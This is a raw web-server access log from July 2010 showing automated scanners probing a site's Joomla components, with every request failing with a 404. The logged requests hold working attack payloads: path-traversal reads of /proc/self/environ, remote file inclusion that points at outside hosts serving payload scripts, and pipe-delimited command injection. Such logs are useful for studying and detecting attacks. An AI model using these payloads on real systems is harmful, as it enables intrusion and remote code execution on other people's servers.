188.165.213.8 - - [26/Jul/2010:15:42:08 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
188.127.248.175 - - [26/Jul/2010:15:42:22 +0200] "GET //index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:15:42:24 +0200] "GET //index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
121.78.118.123 - - [26/Jul/2010:15:42:39 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
188.165.213.8 - - [26/Jul/2010:15:42:55 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:15:42:55 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:15:42:55 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
218.234.23.94 - - [26/Jul/2010:15:43:25 +0200] "GET /sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
218.234.23.94 - - [26/Jul/2010:15:43:25 +0200] "GET /logs/sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 307 "-" "Mozilla/5.0"
218.234.23.94 - - [26/Jul/2010:15:43:25 +0200] "GET /logs/access_log/sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 318 "-" "Mozilla/5.0"
64.34.172.171 - - [26/Jul/2010:15:43:47 +0200] "GET /logs/access_log/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:15:43:47 +0200] "GET /index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:15:43:47 +0200] "GET /logs/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
80.89.233.48 - - [26/Jul/2010:15:45:13 +0200] "GET //index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
188.165.213.8 - - [26/Jul/2010:15:45:16 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:15:45:16 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:15:45:16 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:15:45:43 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
89.200.169.163 - - [26/Jul/2010:15:46:27 +0200] "GET /logs/access_log/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:15:46:27 +0200] "GET /index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:15:46:28 +0200] "GET /logs/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
188.127.248.175 - - [26/Jul/2010:15:47:05 +0200] "GET /logs/access_log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:15:47:05 +0200] "GET //index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:15:47:06 +0200] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
89.200.169.163 - - [26/Jul/2010:15:47:27 +0200] "GET /logs/access_log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:15:47:28 +0200] "GET //index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:15:47:28 +0200] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
188.127.248.175 - - [26/Jul/2010:15:47:30 +0200] "GET /logs/access_log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:15:47:30 +0200] "GET //index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:15:47:30 +0200] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
64.34.172.171 - - [26/Jul/2010:15:47:36 +0200] "GET /logs/access_log/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:15:47:37 +0200] "GET /index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:15:47:37 +0200] "GET /logs/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
89.200.169.163 - - [26/Jul/2010:15:47:52 +0200] "GET /logs/access_log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:15:47:53 +0200] "GET //index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:15:47:53 +0200] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
114.108.151.149 - - [26/Jul/2010:15:48:29 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
80.89.233.48 - - [26/Jul/2010:15:48:41 +0200] "GET /logs/access_log//index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
80.89.233.48 - - [26/Jul/2010:15:48:41 +0200] "GET //index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
80.89.233.48 - - [26/Jul/2010:15:48:41 +0200] "GET /logs//index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
188.165.213.8 - - [26/Jul/2010:15:49:55 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:15:49:56 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:15:49:56 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
218.234.23.94 - - [26/Jul/2010:15:50:16 +0200] "GET /logs/sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 307 "-" "Mozilla/5.0"
218.234.23.94 - - [26/Jul/2010:15:50:16 +0200] "GET /logs/access_log/sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 318 "-" "Mozilla/5.0"
218.234.23.94 - - [26/Jul/2010:15:50:16 +0200] "GET /sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
188.127.248.175 - - [26/Jul/2010:15:50:51 +0200] "GET /logs/access_log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:15:50:52 +0200] "GET //index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:15:50:52 +0200] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
188.72.70.56 - - [26/Jul/2010:15:51:00 +0200] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 354 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:15:51:00 +0200] "GET /logs/access_log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 372 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:15:51:01 +0200] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 359 "-" "Mozilla/5.0"
188.127.248.175 - - [26/Jul/2010:15:51:04 +0200] "GET /logs/access_log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:15:51:05 +0200] "GET //index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:15:51:05 +0200] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
211.202.2.34 - - [26/Jul/2010:15:51:06 +0200] "GET //index.php?option=com_g2bridge&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:51:06 +0200] "GET /logs//index.php?option=com_g2bridge&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:51:06 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:51:07 +0200] "GET //index.php?option=com_g2bridge&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:51:07 +0200] "GET /logs//index.php?option=com_g2bridge&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:51:07 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
188.72.70.56 - - [26/Jul/2010:15:51:09 +0200] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 354 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:15:51:09 +0200] "GET /logs/access_log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 372 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:15:51:09 +0200] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 359 "-" "Mozilla/5.0"
188.165.213.8 - - [26/Jul/2010:15:51:45 +0200] "GET /logs/access_log///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:15:51:45 +0200] "GET ///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:15:51:45 +0200] "GET /logs///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.803"
211.202.2.34 - - [26/Jul/2010:15:53:01 +0200] "GET /logs//index.php?option=com_svmap&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:53:01 +0200] "GET /logs/access_log%20%20//index.php?option=com_svmap&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:53:01 +0200] "GET //index.php?option=com_svmap&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:53:01 +0200] "GET /logs/access_log%20%20//index.php?option=com_svmap&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:53:01 +0200] "GET /logs//index.php?option=com_svmap&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:53:01 +0200] "GET //index.php?option=com_svmap&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
114.108.151.149 - - [26/Jul/2010:15:54:07 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:15:54:08 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:15:54:08 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
77.222.34.35 - - [26/Jul/2010:15:56:15 +0200] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:15:56:15 +0200] "GET /logs/access_log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 314 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:15:56:15 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:15:56:24 +0200] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:15:56:24 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:15:56:24 +0200] "GET /logs/access_log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 314 "-" "Mozilla/5.0"
188.165.213.8 - - [26/Jul/2010:15:58:39 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:15:58:40 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:15:58:40 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
91.206.218.32 - - [26/Jul/2010:15:59:09 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:15:59:09 +0200] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:15:59:09 +0200] "GET /logs/access_log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 314 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:15:59:30 +0200] "GET /logs/access_log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 314 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:15:59:30 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:15:59:30 +0200] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
121.78.118.123 - - [26/Jul/2010:16:06:40 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
121.78.118.123 - - [26/Jul/2010:16:06:41 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
121.78.118.123 - - [26/Jul/2010:16:06:42 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
125.141.91.138 - - [26/Jul/2010:16:08:48 +0200] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 331 "-" "Mozilla/5.0"
125.141.91.138 - - [26/Jul/2010:16:08:48 +0200] "GET /logs/access_log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 344 "-" "Mozilla/5.0"
125.141.91.138 - - [26/Jul/2010:16:08:48 +0200] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 326 "-" "Mozilla/5.0"
125.141.91.138 - - [26/Jul/2010:16:08:58 +0200] "GET /logs/access_log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 344 "-" "Mozilla/5.0"
125.141.91.138 - - [26/Jul/2010:16:08:58 +0200] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 331 "-" "Mozilla/5.0"
125.141.91.138 - - [26/Jul/2010:16:08:58 +0200] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 326 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:16:10:17 +0200] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:16:10:17 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:16:10:17 +0200] "GET /logs/access_log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:16:10:20 +0200] "GET /logs/access_log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 314 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:16:10:20 +0200] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:16:10:20 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:10:25 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:10:25 +0200] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:10:25 +0200] "GET /logs/access_log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:10:34 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:10:34 +0200] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:10:34 +0200] "GET /logs/access_log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 314 "-" "Mozilla/5.0"
188.165.213.8 - - [26/Jul/2010:16:11:11 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:16:11:11 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:16:11:11 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
77.222.34.35 - - [26/Jul/2010:16:12:43 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:16:12:43 +0200] "GET /logs/access_log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:16:12:43 +0200] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:12:53 +0200] "GET /logs/access_log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:12:53 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:12:53 +0200] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
114.108.151.149 - - [26/Jul/2010:16:14:26 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
